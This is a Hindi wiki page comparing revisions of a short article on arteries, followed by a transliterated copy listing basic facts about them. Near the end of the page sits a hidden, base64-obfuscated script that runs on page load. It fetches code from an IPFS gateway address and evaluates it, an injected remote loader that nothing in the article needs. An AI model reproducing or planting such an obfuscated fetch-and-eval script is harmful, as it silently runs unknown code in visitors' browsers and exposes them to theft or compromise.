Difference between revisions of "धमनी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना; Adding category Category:मानव शरीर (को हटा दिया गया हैं।))
 
(10 intermediate revisions by 5 users not shown)
Line 1: Line 1:
*([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Arteries) धमनियाँ वे [[रुधिर वाहिनियाँ]] हैं जो [[रुधिर]] को [[ह्रदय]] से शरीर के विभिन्न अंगों की ओर ले जाती हैं।  
+
'''{{PAGENAME}}''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Artery) लेख में [[मानव शरीर]] से संबंधित उल्लेख है।
 +
*धमनियाँ वे [[रुधिर वाहिनियाँ]] हैं जो [[रुधिर]] को [[हृदय]] से शरीर के विभिन्न अंगों की ओर ले जाती हैं।  
 
*पल्मोनरी धमनी के अतिरिक्त इनमें शुद्ध रुधिर बहता है।  
 
*पल्मोनरी धमनी के अतिरिक्त इनमें शुद्ध रुधिर बहता है।  
 
*धमनियों में शुद्ध रक्त बहता है।
 
*धमनियों में शुद्ध रक्त बहता है।
Line 10: Line 11:
 
*ये [[त्वचा]] से दूर गहराई में स्थित होती हैं।
 
*ये [[त्वचा]] से दूर गहराई में स्थित होती हैं।
 
*इनमें हर समय कुल रुधिर का लगभग 15% अंश भरा होता है।
 
*इनमें हर समय कुल रुधिर का लगभग 15% अंश भरा होता है।
 +
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 17: Line 19:
 
|शोध=
 
|शोध=
 
}}
 
}}
__INDEX__
+
 
 +
==संबंधित लेख==
 +
{{मानव शरीर}}
 
[[Category:जीव विज्ञान]]
 
[[Category:जीव विज्ञान]]
 
[[Category:विज्ञान कोश]]
 
[[Category:विज्ञान कोश]]
 
[[Category:मानव शरीर]]
 
[[Category:मानव शरीर]]
 +
__INDEX__

Latest revision as of 10:17, 17 April 2012

dhamani (aangrezi:Artery) lekh mean manav sharir se sanbandhit ullekh hai.

  • dhamaniyaan ve rudhir vahiniyaan haian jo rudhir ko hriday se sharir ke vibhinn aangoan ki or le jati haian.
  • palmonari dhamani ke atirikt inamean shuddh rudhir bahata hai.
  • dhamaniyoan mean shuddh rakt bahata hai.
  • dhamaniyoan ki divarean moti tatha lachili hoti haian.
  • dhamaniyoan ka bhitari vyas (guha) kam hota hai.
  • inamean kapat nahian pae jate haian.
  • inamean rudhir atyadhik dabav ke karan jhatake ke sath bahata hai.
  • dhamaniyaan rudhir n rahane par chipachipi nahian haian.
  • inaka rang gulabi ya chatak lal hota hai.
  • ye tvacha se door gaharaee mean sthit hoti haian.
  • inamean har samay kul rudhir ka lagabhag 15% aansh bhara hota hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh